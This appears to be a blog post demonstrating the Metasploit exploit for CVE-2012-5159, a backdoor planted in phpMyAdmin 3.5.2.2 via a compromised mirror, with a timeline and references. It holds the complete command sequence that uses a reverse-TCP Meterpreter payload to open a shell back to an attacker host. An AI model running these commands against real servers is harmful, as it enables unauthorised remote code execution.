CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Timeline :

Backdoor discovered by Passerby the 2012-09-25
Backdoor presence vendor notification the 2012-09-25
Metasploit PoC provided the 2012-09-25

PoC provided by :

hdm

Reference(s) :

PMASA-2012-5
CVE-2012-5159
BID-51211

Affected version(s) :

phpMyAdmin-3.5.2.2-all-languages.zip downloaded from cdnetworks-kr-1 SourceForget.net mirror.

Tested on Ubuntu 11.10 i386 with :

phpMyAdmin-3.5.2.2-all-languages.zip

Description :

This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.

Commands :

use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

1 thought on “CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Comments are closed.